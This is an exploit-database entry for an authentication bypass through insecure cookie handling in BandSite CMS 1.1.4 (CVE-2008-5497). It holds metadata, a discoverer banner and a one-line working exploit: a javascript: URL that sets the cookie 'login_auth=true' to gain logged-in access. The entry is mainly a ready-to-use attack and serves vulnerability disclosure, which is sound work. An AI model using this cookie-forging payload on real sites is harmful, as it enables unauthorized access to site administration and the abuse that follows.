BandSite CMS 1.1.4 - Insecure Cookie Handling
Author: Stack
type: webapps
platform: php
port:
date_added: 2008-11-12
date_updated: 2016-12-21
verified: 1
codes: OSVDB-50701;CVE-2008-5497
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.combandsitecmsVer1x1x4.zip
###########################################################################
[+] BandSite CMS 1.1.4 Insecure Cookie Handling Vulnerability
[+] Discovered By Mountassif Moad
[+] www.v4-team.com
[+] Greetz : All my Freind
###########################################################################
Exploit:
javascript:document.cookie = "login_auth=true; path=/";
# milw0rm.com [2008-11-13]